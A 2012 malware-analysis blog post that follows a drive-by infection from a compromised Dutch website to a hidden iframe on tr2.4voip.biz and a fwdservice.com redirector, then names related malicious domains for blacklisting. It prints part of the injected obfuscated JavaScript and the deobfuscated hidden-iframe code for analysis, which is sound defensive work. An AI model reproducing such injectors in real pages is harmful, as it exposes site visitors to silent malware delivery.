Saturday, September 1, 2012

Suspicious Movement in ASN40034 (infector to tr2.4voip.biz & fwdservice.com) 

It's beginning from infected hosting homepage of hxxp://dansenbijjansen.com/
It is a good honest site. Sadly, it's having the suspicious code at 

hxxp://dansenbijjansen.com/foto/index.php?



I downloaded to examine to find the below JS/Code:

<script>el=document.createElement("div");try{a}catch(qq)
{el.appendChild(document.createElement("p"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"),el.childNodes[1]);with(el)
{appendChild(document.createTextNode("eva"));}}
k=el.lastChild.nodeValue;ar="A4 2E\"lTb?we 
Cy";ar2="R8c8c140c116c192c96c148c176c160c128c76c44c168c92c132c172c44
c92c16c24c44c76c44c168c92c68c80c200c28c52c172c124c52c76c44c96c152c32
c176c148c200c152c156c84c108c100c156c88c8c8c8c140c116c104c52c76c44c104
c96c156c180c8c8c120c192c44c24c68c44c192c88c8c8c8c148c176c160c128c76
c44c168c92c132c40c104c140c92c44c96c20c48c140c116.....and so on....


↑was easily to deobfuscate to find the below iframer...

<iframe src='hxxp://tr2.4voip.biz/in.cgi?2' width='10' height='10' style=
'visibility:hidden;position:absolute;left:0;top:0;'></iframe>


Which making me checking the hxxp://tr2.4voip.biz/in.cgi?2 to find-
the multiple malicious links as per coded below:


↑The above links is obviously for the purpose to make sure users are -
redirected to the below HTML file with another JS code:


It will lead us to the link of:

hxxp://fwdservice.com/main.php?dmn=4voip.biz&folio=7POYGN0G2&gkwrf&p_bkt=


What's this? We have many reference about it in the urlquery below:


This is actually a url forwarder service used to redirect request to some-
other URL for the downloading or etc purpose. I checked to the recorded URL-
And found the format of the query like:

hxxp://fwdservice.com/main.php?dmn=lejebolig.net&folio= \
7POJ4E717&gkwrf=hxxp://www.ansa.no/ANSAland/Danmark/Lokallag/\
Kobenhavn/A-bo-i-Kobenhavn/Finne_bolig_i_Kobenhavn/&p_bkt=
 Or....

hxxp://fwdservice.com/main.php?dmn=sniegul.com&folio=
7POYGN0G2&gkwrf=http://priv.ckp.pl/moonforge/&p_bkt= 


In our case with the certain ticket (folio=7POYGN0G2) and - 
domain (dmn=dmn=4voip.biz) forwarded us to special path in 4voip.biz host.
Be free to check and analyzed further of what you can get from that host.

The interesting part is tr2.4voip.biz and fwdservice.com are in the -
same network :


With sharing same IP address with lame malicious domain like:

netsecur.com
wwwfaceboko.com
yourmoneybox.net

Blacklisting 4voip.biz and fwdservice.com will be a nice idea!
Posted by unixfreaxjp at